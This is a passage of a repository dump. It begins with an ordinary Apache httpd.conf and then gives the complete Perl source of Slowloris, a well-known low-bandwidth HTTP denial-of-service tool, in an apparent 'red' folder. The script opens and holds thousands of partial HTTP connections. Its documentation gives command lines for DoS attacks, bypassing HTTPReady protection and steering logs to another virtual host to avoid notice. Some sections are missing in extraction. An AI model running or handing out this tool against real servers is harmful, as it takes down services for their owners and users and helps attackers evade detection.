ldap_module modules/mod_ldap.so 50 | LoadModule authnz_ldap_module modules/mod_authnz_ldap.so 51 | LoadModule include_module modules/mod_include.so 52 | LoadModule log_config_module modules/mod_log_config.so 53 | LoadModule logio_module modules/mod_logio.so 54 | LoadModule env_module modules/mod_env.so 55 | LoadModule ext_filter_module modules/mod_ext_filter.so 56 | LoadModule mime_magic_module modules/mod_mime_magic.so 57 | LoadModule expires_module modules/mod_expires.so 58 | LoadModule deflate_module modules/mod_deflate.so 59 | LoadModule headers_module modules/mod_headers.so 60 | LoadModule usertrack_module modules/mod_usertrack.so 61 | LoadModule setenvif_module modules/mod_setenvif.so 62 | LoadModule mime_module modules/mod_mime.so 63 | LoadModule dav_module modules/mod_dav.so 64 | LoadModule status_module modules/mod_status.so 65 | LoadModule autoindex_module modules/mod_autoindex.so 66 | LoadModule info_module modules/mod_info.so 67 | LoadModule dav_fs_module modules/mod_dav_fs.so 68 | LoadModule vhost_alias_module modules/mod_vhost_alias.so 69 | LoadModule negotiation_module modules/mod_negotiation.so 70 | LoadModule dir_module modules/mod_dir.so 71 | LoadModule actions_module modules/mod_actions.so 72 | LoadModule speling_module modules/mod_speling.so 73 | LoadModule userdir_module modules/mod_userdir.so 74 | LoadModule alias_module modules/mod_alias.so 75 | LoadModule substitute_module modules/mod_substitute.so 76 | LoadModule rewrite_module modules/mod_rewrite.so 77 | LoadModule proxy_module modules/mod_proxy.so 78 | LoadModule proxy_balancer_module modules/mod_proxy_balancer.so 79 | LoadModule proxy_ftp_module modules/mod_proxy_ftp.so 80 | LoadModule proxy_http_module modules/mod_proxy_http.so 81 | LoadModule proxy_ajp_module modules/mod_proxy_ajp.so 82 | LoadModule proxy_connect_module modules/mod_proxy_connect.so 83 | LoadModule cache_module modules/mod_cache.so 84 | LoadModule suexec_module modules/mod_suexec.so 85 | LoadModule disk_cache_module modules/mod_disk_cache.so 86 | LoadModule cgi_module modules/mod_cgi.so 87 | LoadModule version_module modules/mod_version.so 88 | 89 | 90 | Include conf.d/*.conf 91 | 92 | 93 | User apache 94 | Group apache 95 | 96 | 97 | ServerAdmin root@localhost 98 | 99 | 100 | UseCanonicalName Off 101 | 102 | DocumentRoot "/var/www/html" 103 | 104 | 105 | Options FollowSymLinks 106 | AllowOverride None 107 | 108 | 109 | 110 | 111 | 112 | Options -Indexes -FollowSymLinks -ExecCGI 113 | 114 | AllowOverride None 115 | 116 | Order allow,deny 117 | Allow from all 118 | 119 | 120 | 121 | 122 | UserDir disabled 123 | 124 | 125 | 126 | 127 | 128 | AccessFileName .htaccess 129 | 130 | 131 | Order allow,deny 132 | Deny from all 133 | Satisfy All 134 | 135 | 136 | TypesConfig /etc/mime.types 137 | 138 | DefaultType text/plain 139 | 140 | 141 | MIMEMagicFile conf/magic 142 | 143 | 144 | HostnameLookups Off 145 | 146 | ErrorLog logs/error_log 147 | 148 | LogLevel warn 149 | 150 | LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined 151 | LogFormat "%h %l %u %t \"%r\" %>s %b" common 152 | LogFormat "%{Referer}i -> %U" referer 153 | LogFormat "%{User-agent}i" agent 154 | 155 | CustomLog logs/access_log combined 156 | 157 | ServerSignature Off 158 | 159 | Alias /icons/ "/var/www/icons/" 160 | 161 | 162 | Options Indexes MultiViews FollowSymLinks 163 | AllowOverride None 164 | Order allow,deny 165 | Allow from all 166 | 167 | 168 | 169 | DAVLockDB /var/lib/dav/lockdb 170 | 171 | 172 | ScriptAlias /cgi-bin/ "/var/www/cgi-bin/" 173 | 174 | 175 | AllowOverride None 176 | Options None 177 | Order allow,deny 178 | Allow from all 179 | 180 | 181 | 182 | 183 | IndexOptions FancyIndexing VersionSort NameWidth=* HTMLTable Charset=UTF-8 184 | 185 | AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip 186 | 187 | AddIconByType (TXT,/icons/text.gif) text/* 188 | AddIconByType (IMG,/icons/image2.gif) image/* 189 | AddIconByType (SND,/icons/sound2.gif) audio/* 190 | AddIconByType (VID,/icons/movie.gif) video/* 191 | 192 | AddIcon /icons/binary.gif .bin .exe 193 | AddIcon /icons/binhex.gif .hqx 194 | AddIcon /icons/tar.gif .tar 195 | AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv 196 | AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip 197 | AddIcon /icons/a.gif .ps .ai .eps 198 | AddIcon /icons/layout.gif .html .shtml .htm .pdf 199 | AddIcon /icons/text.gif .txt 200 | AddIcon /icons/c.gif .c 201 | AddIcon /icons/p.gif .pl .py 202 | AddIcon /icons/f.gif .for 203 | AddIcon /icons/dvi.gif .dvi 204 | AddIcon /icons/uuencoded.gif .uu 205 | AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl 206 | AddIcon /icons/tex.gif .tex 207 | AddIcon /icons/bomb.gif core 208 | 209 | AddIcon /icons/back.gif .. 210 | AddIcon /icons/hand.right.gif README 211 | AddIcon /icons/folder.gif ^^DIRECTORY^^ 212 | AddIcon /icons/blank.gif ^^BLANKICON^^ 213 | 214 | DefaultIcon /icons/unknown.gif 215 | 216 | 217 | ReadmeName README.html 218 | HeaderName HEADER.html 219 | 220 | AddLanguage en .en 221 | 222 | LanguagePriority en ca cs da de el eo es et fr he hr it ja ko ltz nl nn no pl pt pt-BR ru sv zh-CN zh-TW 223 | 224 | ForceLanguagePriority Prefer Fallback 225 | 226 | AddDefaultCharset UTF-8 227 | 228 | AddType application/x-compress .Z 229 | AddType application/x-gzip .gz .tgz 230 | 231 | AddType application/x-x509-ca-cert .crt 232 | AddType application/x-pkcs7-crl .crl 233 | 234 | AddHandler type-map var 235 | 236 | AddType text/html .shtml 237 | AddOutputFilter INCLUDES .shtml 238 | 239 | Alias /error/ "/var/www/error/" 240 | 241 | 242 | 243 | 244 | AllowOverride None 245 | Options IncludesNoExec 246 | AddOutputFilter Includes html 247 | AddHandler type-map var 248 | Order allow,deny 249 | Allow from all 250 | LanguagePriority en es de fr 251 | ForceLanguagePriority Prefer Fallback 252 | 253 | 254 | 255 | 256 | 257 | BrowserMatch "Mozilla/2" nokeepalive 258 | BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0 259 | BrowserMatch "RealPlayer 4\.0" force-response-1.0 260 | BrowserMatch "Java/1\.0" force-response-1.0 261 | BrowserMatch "JDK/1\.0" force-response-1.0 262 | 263 | BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully 264 | BrowserMatch "MS FrontPage" redirect-carefully 265 | BrowserMatch "^WebDrive" redirect-carefully 266 | BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully 267 | BrowserMatch "^gnome-vfs/1.0" redirect-carefully 268 | BrowserMatch "^XML Spy" redirect-carefully 269 | BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully 270 | 271 | -------------------------------------------------------------------------------- /red/slowloris.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | use strict; 3 | use IO::Socket::INET; 4 | use IO::Socket::SSL; 5 | use Getopt::Long; 6 | use Config; 7 | 8 | $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors 9 | 10 | print < \$shost, 45 | 'dns=s' => \$host, 46 | 'httpready' => \$httpready, 47 | 'num=i' => \$connections, 48 | 'cache' => \$cache, 49 | 'port=i' => \$port, 50 | 'https' => \$ssl, 51 | 'tcpto=i' => \$tcpto, 52 | 'test' => \$test, 53 | 'timeout=i' => \$timeout, 54 | 'version' => \$version, 55 | ); 56 | 57 | if ($version) { 58 | print "Version 0.7\n"; 59 | exit; 60 | } 61 | 62 | unless ($host) { 63 | print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; 64 | print "\n\tType 'perldoc $0' for help with options.\n\n"; 65 | exit; 66 | } 67 | 68 | unless ($port) { 69 | $port = 80; 70 | print "Defaulting to port 80.\n"; 71 | } 72 | 73 | unless ($tcpto) { 74 | $tcpto = 5; 75 | print "Defaulting to a 5 second tcp connection timeout.\n"; 76 | } 77 | 78 | unless ($test) { 79 | unless ($timeout) { 80 | $timeout = 5; 81 | print "Defaulting to a 100 second re-try timeout.\n"; 82 | } 83 | unless ($connections) { 84 | $connections = 10000; 85 | print "Defaulting to 1000 connections.\n"; 86 | } 87 | } 88 | 89 | my $usemultithreading = 0; 90 | if ( $Config{usethreads} ) { 91 | print "Multithreading enabled.\n"; 92 | $usemultithreading = 1; 93 | use threads; 94 | use threads::shared; 95 | } 96 | else { 97 | print "No multithreading capabilites found!\n"; 98 | print "Slowloris will be slower than normal as a result.\n"; 99 | } 100 | 101 | my $packetcount : shared = 0; 102 | my $failed : shared = 0; 103 | my $connectioncount : shared = 0; 104 | 105 | srand() if ($cache); 106 | 107 | if ($shost) { 108 | $sendhost = $shost; 109 | } 110 | else { 111 | $sendhost = $host; 112 | } 113 | if ($httpready) { 114 | $method = "POST"; 115 | } 116 | else { 117 | $method = "GET"; 118 | } 119 | 120 | if ($test) { 121 | my @times = ( "2", "30", "90", "240", "500" ); 122 | my $totaltime = 0; 123 | foreach (@times) { 124 | $totaltime = $totaltime + $_; 125 | } 126 | $totaltime = $totaltime / 60; 127 | print "This test could take up to $totaltime minutes.\n"; 128 | 129 | my $delay = 0; 130 | my $working = 0; 131 | my $sock; 132 | 133 | if ($ssl) { 134 | if ( 135 | $sock = new IO::Socket::SSL( 136 | PeerAddr => "$host", 137 | PeerPort => "$port", 138 | Timeout => "$tcpto", 139 | Proto => "tcp", 140 | ) 141 | ) 142 | { 143 | $working = 1; 144 | } 145 | } 146 | else { 147 | if ( 148 | $sock = new IO::Socket::INET( 149 | PeerAddr => "$host", 150 | PeerPort => "$port", 151 | Timeout => "$tcpto", 152 | Proto => "tcp", 153 | ) 154 | ) 155 | { 156 | $working = 1; 157 | } 158 | } 159 | if ($working) { 160 | if ($cache) { 161 | $rand = "?" . int( rand(99999999999999) ); 162 | } 163 | else { 164 | $rand = ""; 165 | } 166 | my $primarypayload = 167 | "GET /$rand HTTP/1.1\r\n" 168 | . "Host: $sendhost\r\n" 169 | . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" 170 | . "Content-Length: 42\r\n"; 171 | if ( print $sock $primarypayload ) { 172 | print "Connection successful, now comes the waiting game...\n"; 173 | } 174 | else { 175 | print 176 | "That's odd - I connected but couldn't send the data to $host:$port.\n"; 177 | print "Is something wrong?\nDying.\n"; 178 | exit; 179 | } 180 | } 181 | else { 182 | print "Uhm... I can't connect to $host:$port.\n"; 183 | print "Is something wrong?\nDying.\n"; 184 | exit; 185 | } 186 | for ( my $i = 0 ; $i <= $#times ; $i++ ) { 187 | print "Trying a $times[$i] second delay: \n"; 188 | sleep( $times[$i] ); 189 | if ( print $sock "X-a: b\r\n" ) { 190 | print "\tWorked.\n"; 191 | $delay = $times[$i]; 192 | } 193 | else { 194 | if ( $SIG{__WARN__} ) { 195 | $delay = $times[ $i - 1 ]; 196 | last; 197 | } 198 | print "\tFailed after $times[$i] seconds.\n"; 199 | } 200 | } 201 | 202 | if ( print $sock "Connection: Close\r\n\r\n" ) { 203 | print "Okay that's enough time. Slowloris closed the socket.\n"; 204 | print "Use $delay seconds for -timeout.\n"; 205 | exit; 206 | } 207 | else { 208 | print "Remote server closed socket.\n"; 209 | print "Use $delay seconds for -timeout.\n"; 210 | exit; 211 | } 212 | if ( $delay < 166 ) { 213 | print < "$host", 249 | PeerPort => "$port", 250 | Timeout => "$tcpto", 251 | Proto => "tcp", 252 | ) 253 | ) 254 | { 255 | $working[$z] = 1; 256 | } 257 | else { 258 | $working[$z] = 0; 259 | } 260 | } 261 | else { 262 | if ( 263 | $sock[$z] = new IO::Socket::INET( 264 | PeerAddr => "$host", 265 | PeerPort => "$port", 266 | Timeout => "$tcpto", 267 | Proto => "tcp", 268 | ) 269 | ) 270 | { 271 | $working[$z] = 1; 272 | $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK 273 | } 274 | else { 275 | $working[$z] = 0; 276 | } 277 | } 278 | if ( $working[$z] == 1 ) { 279 | if ($cache) { 280 | $rand = "?" . int( rand(99999999999999) ); 281 | } 282 | else { 283 | $rand = ""; 284 | } 285 | my $primarypayload = 286 | "$method /$rand HTTP/1.1\r\n" 287 | . "Host: $sendhost\r\n" 288 | . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" 289 | . "Content-Length: 42\r\n"; 290 | my $handle = $sock[$z]; 291 | if ($handle) { 292 | print $handle "$primarypayload"; 293 | if ( $SIG{__WARN__} ) { 294 | $working[$z] = 0; 295 | close $handle; 296 | $failed++; 297 | $failedconnections++; 298 | } 299 | else { 300 | $packetcount++; 301 | $working[$z] = 1; 302 | } 303 | } 304 | else { 305 | $working[$z] = 0; 306 | $failed++; 307 | $failedconnections++; 308 | } 309 | } 310 | else { 311 | $working[$z] = 0; 312 | $failed++; 313 | $failedconnections++; 314 | } 315 | } 316 | } 317 | print "\t\tSending data.\n"; 318 | foreach my $z ( 1 .. $num ) { 319 | if ( $working[$z] == 1 ) { 320 | if ( $sock[$z] ) { 321 | my $handle = $sock[$z]; 322 | if ( print $handle "X-a: b\r\n" ) { 323 | $working[$z] = 1; 324 | $packetcount++; 325 | } 326 | else { 327 | $working[$z] = 0; 328 | #debugging info 329 | $failed++; 330 | $failedconnections++; 331 | } 332 | } 333 | else { 334 | $working[$z] = 0; 335 | #debugging info 336 | $failed++; 337 | $failedconnections++; 338 | } 339 | } 340 | } 341 | print 342 | "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; 343 | sleep($timeout); 344 | } 345 | } 346 | 347 | sub domultithreading { 348 | my ($num) = @_; 349 | my @thrs; 350 | my $i = 0; 351 | my $connectionsperthread = 50; 352 | while ( $i < $num ) { 353 | $thrs[$i] = 354 | threads->create( \&doconnections, $connectionsperthread, 1 ); 355 | $i += $connectionsperthread; 356 | } 357 | my @threadslist = threads->list(); 358 | while ( $#threadslist > 0 ) { 359 | $failed = 0; 360 | } 361 | } 362 | 363 | __END__ 364 | 365 | =head1 TITLE 366 | 367 | Slowloris 368 | 369 | =head1 VERSION 370 | 371 | Version 0.7 Beta 372 | 373 | =head1 DATE 374 | 375 | 06/17/2009 376 | 377 | =head1 AUTHOR 378 | 379 | RSnake with threading from John Kinsella 380 | 381 | =head1 ABSTRACT 382 | 383 | Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons. 384 | 385 | =head1 AFFECTS 386 | 387 | Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...? 388 | 389 | =head1 NOT AFFECTED 390 | 391 | IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...? 392 | 393 | =head1 DESCRIPTION 394 | 395 | Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well. 396 | 397 | As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood. 398 | 399 | =head2 Testing 400 | 401 | If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing: 402 | 403 | =head3 Testing Example: 404 | 405 | ./slowloris.pl -dns www.example.com -port 80 -test 406 | 407 | This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing). 408 | 409 | =head2 HTTP DoS 410 | 411 | Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though. 412 | 413 | =head3 HTTP DoS Example: 414 | 415 | ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 416 | 417 | =head2 HTTPReady Bypass 418 | 419 | HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch. 420 | 421 | =head3 HTTPReady Bypass Example 422 | 423 | ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready 424 | 425 | =head2 Stealth Host DoS 426 | 427 | If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately. 428 | 429 | =head3 Stealth Host DoS Example: 430 | 431 | ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com 432 | 433 | =head2 HTTPS DoS 434 | 435 | Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary. 436 | 437 | =head3 HTTPS DoS Example: 438 | 439 | ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https 440 | 441 | =head2 HTTP Cache 442 | 443 | Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary. 444 | 445 | =head3 HTTP Cache Example: 446 | 447 | ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache 448 | 449 | =head1 Issues 450 | 451 | Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested. 452 | 453 | Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture. 454 | 455 | For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD. 456 | 457 | Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too. 458 | 459 | =head1 What is a slow loris? 460 | 461 | What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out: 462 | 463 | http://www.youtube.com/watch?v=rLdQ3UhLoD4 464 | --------------------------------------------------------------------------------